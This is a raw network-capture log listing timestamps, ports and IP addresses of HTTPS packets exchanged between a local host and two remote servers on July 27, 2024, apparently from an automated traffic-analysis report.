Jul 27, 2024 07:30:23.354816914 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.354859114 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.354865074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.354878902 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.354907036 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.355058908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.355072021 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.355132103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.355139017 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.355179071 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.355451107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.355465889 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.355508089 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.355515003 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.355535030 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.355551004 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.356139898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.356158018 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.356209040 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.356216908 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.356256962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.358110905 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.362725019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.362746954 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.362812042 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.362823009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.362864971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.363414049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.363431931 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.363495111 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.363502979 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.363538027 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.364444017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.402046919 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.402064085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.402123928 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.402132034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.402286053 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.445624113 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.445638895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.445691109 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.445697069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.445722103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.445740938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446181059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446197033 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446237087 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446249008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446261883 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446296930 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446517944 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446537018 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446573973 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446582079 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446594954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446619034 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446866989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446882010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446922064 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446928978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.446939945 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446964979 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.446975946 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.447009087 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.447026968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.447036028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.447052956 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.447073936 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.450054884 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.452907085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.452922106 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.452977896 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.453001976 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.453051090 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.453294039 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.453309059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.453351974 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.453357935 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.453381062 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.453397989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.453600883 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.492597103 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.492611885 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.492675066 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.492681980 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.492713928 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.492724895 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.543324947 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.543349028 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.543447971 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.543478012 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.543529034 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.543879032 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.543909073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.543958902 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.543973923 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.543975115 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.543983936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.544011116 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.544018030 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.544047117 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.544068098 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.544406891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.544420004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.544457912 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.544466019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.544477940 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.544516087 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.545049906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.545064926 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.545100927 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.545108080 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.545121908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.545146942 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.547862053 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.547882080 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.547939062 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.547946930 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.547991037 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.548476934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.548497915 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.548537970 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.548546076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.548558950 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.548583984 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.550266027 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.583519936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.583537102 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.583606958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.583615065 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.583661079 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.634428978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.634447098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.634547949 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.634578943 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.634629965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.634639978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.634656906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.634696007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.634704113 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.634749889 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.635049105 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.635062933 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.635111094 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.635118961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.635162115 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.635904074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.635917902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.635968924 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.635976076 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.636020899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.636085987 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.636104107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.636148930 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.636156082 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.636168957 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.636194944 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.638492107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.638508081 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.638564110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.638572931 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.638617992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.638931990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.638946056 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.639003038 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.639010906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.639058113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.639895916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.674324989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.674344063 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.674432039 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.674442053 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.674488068 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.725014925 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725034952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725080013 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725109100 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.725126982 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725147963 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.725181103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.725480080 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725492001 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725533962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.725542068 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.725578070 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.726147890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.726166010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.726205111 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.726212025 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.726226091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.726466894 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.726479053 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.726525068 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.726532936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.728883982 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.728904009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.728954077 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.728960991 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.728976965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.729456902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.729470015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.729533911 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.729546070 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.729814053 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.764858007 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.764873981 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.764939070 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.764946938 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.815968990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.815994024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816052914 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816062927 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816086054 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816129923 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816178083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816179991 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816189051 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816200972 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816215038 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816232920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816235065 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816245079 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816350937 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816368103 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816399097 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816426039 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816431046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816895008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816905975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.816958904 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.816967010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.817306042 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.817322969 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.817370892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.817378998 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.817390919 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.819782972 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.819794893 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.819844007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.819850922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.819864988 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.819930077 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.820254087 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.820267916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.820307016 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.820312977 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.820324898 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.823996067 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.858861923 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.858879089 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.858977079 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.858988047 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.905716896 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.905843973 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.908556938 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.908576965 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.908642054 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.908653021 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909094095 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909101009 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909107924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909136057 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909153938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.909166098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909187078 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.909471989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909504890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909513950 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909523964 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.909532070 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909547091 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.909562111 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.909565926 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.909581900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.910100937 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.910113096 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.910172939 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.910181046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.910454988 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.910470963 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.910506010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.910511971 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.910533905 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.911011934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.911024094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.911071062 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.911077976 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.911549091 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.911565065 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.911600113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.911607027 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.911628962 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.933279991 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.933327913 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.933394909 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.933408022 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.934216022 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.935925007 CEST	51815	443	192.168.2.5	107.173.160.139
Jul 27, 2024 07:30:23.938566923 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.943056107 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.949695110 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.949702978 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.949731112 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.949770927 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.949779034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.949810982 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.980519056 CEST	443	51815	107.173.160.139	192.168.2.5
Jul 27, 2024 07:30:23.991250992 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.999372005 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999380112 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999409914 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999418974 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999445915 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.999455929 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999500990 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.999907017 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999927044 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999955893 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999964952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:23.999964952 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.999990940 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:23.999996901 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000009060 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.000037909 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.000350952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000368118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000410080 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.000416994 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000431061 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.000452042 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:24.000874996 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000891924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:24.000941992 CEST	51812	443	192.168.2.5	185.149.100.242
